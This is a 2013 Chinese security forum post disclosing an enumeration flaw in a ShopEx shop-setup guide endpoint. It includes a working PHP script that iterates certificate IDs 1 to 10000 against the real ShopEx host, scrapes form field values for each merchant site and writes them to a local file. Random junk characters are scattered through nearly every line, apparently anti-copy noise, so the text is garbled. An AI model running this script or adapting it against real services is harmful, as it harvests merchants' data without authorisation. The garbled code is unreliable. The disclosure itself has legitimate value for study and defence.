找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2612|回复: 0
打印 上一主题 下一主题

ShopEx某接口缺陷可遍历所有用户网站

[复制链接]
跳转到指定楼层
楼主
发表于 2013-9-21 15:59:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:* j: i0 n( P- |  W7 _, T5 _& @
ShopEx某接口缺陷,可遍历所有网站
/ @5 g# r2 r3 B& G' k) E0 f& ~5 [详细说明:
9 v. p7 X$ Q8 v  {, i$ _1 Y问题出现在shopex 网店使用向导页面
9 a* H# u% P/ z
5 U' r8 _$ E# j: q. I
1 @4 P* I( v$ I7 I. t$ C, W- Z6 u
" E! R1 s' g4 m7 Whttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
( ~6 W1 m9 e5 a& l: E  z1 `& A0 f* f
; K# C6 Y" u& j8 i, Z% o, E

' n2 w; j+ _" M% g# wrefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}/ V# @- `  s% |! X* e" K

1 ^' t* j7 m$ z  u
5 P. E6 @- j6 t8 E* z, Y; m
; A8 Z+ E9 E& f( E# s4 r1 t$ n我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
: k1 D3 k# m4 {7 K5 M0 z
7 N# D2 C9 I) h# {" G
7 ]4 {0 O; D; Q8 ^5 \' O0 b/ i& c0 }9 S4 V# _) B' }
<?php1 [$ M1 p/ W& z$ x4 K

% J4 ^+ E  ^; ?/ N                for ($i=1; $i < 10000; $i++) { //遍历
* V$ Z6 M" c, @5 D
& s" Q. T1 U$ i+ _                        ShowshopExD($i);
0 j$ Z' s+ J* c8 z- y/ t, M. Q/ M& n7 R* H7 D5 c( M- C
                }+ x2 w7 v9 h4 M( @9 [% @1 _  e/ o
2 x5 R- |4 m" v# @2 Z- ~, x) ~
                function ShowshopExD($cid) {. X0 f& S8 C4 A+ i6 Y4 H6 K$ b( K
$ P2 ]- l1 {) \
                $url='http://guide.ecos.shopex.cn/step2.php';
- O9 S. D3 m9 L* a5 a0 j$ F
0 r; ?4 U; i3 o% U# q3 V- Y                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');! j6 Z+ f+ a9 J5 C$ Q
) f& S, c* L$ S
        $url = $url.'?refer='.$refer;5 K* E% z6 p7 T. F5 H  f
4 h- Q  A7 C8 f& R. \2 X
        $ch = curl_init($url);
% ~  D$ ?9 Y0 O
$ m" a& b7 t$ Q8 H' y0 }        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;/ P/ P" W, r  J2 b+ `, `, N% s
& m1 t. K% R3 ]' J+ Q4 G
        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
* p9 Y0 c( f1 _, A$ `, s0 Y
3 P) w! Q" J% }" Q5 V; j' x        $result = curl_exec($ch);
# n# d/ ?9 J+ @7 \3 r0 _
* u" q5 i4 a% n* a        $result = mb_convert_encoding($result, "gb2312", "UTF-8");
' u: B( _% Q1 N
3 }% E# P* x, h; D        if(strpos($result,$refer))
( Z& X; A. ?+ H! ^5 Y$ {5 y% n5 ^6 J, t/ @, K  ?: m
        {
( F" G7 p: a; U# J" g# E
& x3 _; B7 I9 O; ?  K9 Y                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
5 J& h) \4 L, M7 A
2 }: Q; R( ?: F( t                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);: W$ a' B* O) w  X7 ^+ }  f* r

" w4 j7 V2 E: I) Y2 E9 j$ o                foreach ($value[1] as $key) {
1 O7 @3 r& H7 t
3 _$ _9 D5 t7 }8 s1 D. f                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
( x1 J, v& X! |9 a7 `/ b; H6 K
. L3 e4 `6 i1 r                        echo $res[1][0].':'.$res[3][0]."\r\n";9 l4 S1 Q5 ~, E( y. x7 G

; m# l# A/ t/ D- ?$ a# [                        $col =$res[1][0].':'.$res[3][0]."\r\n"; ( a# L  n3 _2 `. B4 W
+ o5 Y5 ~' s3 r+ M  W
                        fwrite($fp, $col, strlen($col));
- z, m: ]' c/ ~/ X+ M8 d0 ^+ b4 w# u# P. X! j/ k7 a5 E) }
                }
0 `6 S2 I* @1 F. F) \9 g, w- s% a
! W% l# f3 j" C                echo '--------------------------------'."\r\n";  X: Z; B6 p* h9 ~- i0 v6 [
5 G% y) o  Z  V* h# {
                fclose($fp); . u/ f( C0 q) C" Y* B) ~  N
( k8 u4 [' Q. H) W7 Z2 y$ b& K' }3 s3 a; u5 p
        }
' `& n2 P" d" s" y5 \, k0 N0 B+ _, [
, `2 O$ W( e0 ~# f/ ~        flush();% w* e  T- ]; t7 x, e

. ^+ C. b# k6 }- i        curl_close($ch);# ^6 Y  d( \) n6 C5 z3 n# t) k
7 Z# t  r2 _! D6 U# e: }
                }0 a  Z: R5 V3 _  U0 x/ Q
( Z6 a5 _+ r! h, Y5 a
?>% X+ A' [& ^, R) @. G% ^
漏洞证明:" Y2 M. r  h% J: W* o
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg5 O" K) A8 q* v
refer换成其他加密方式4 E2 t0 U' ^- E: J' a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表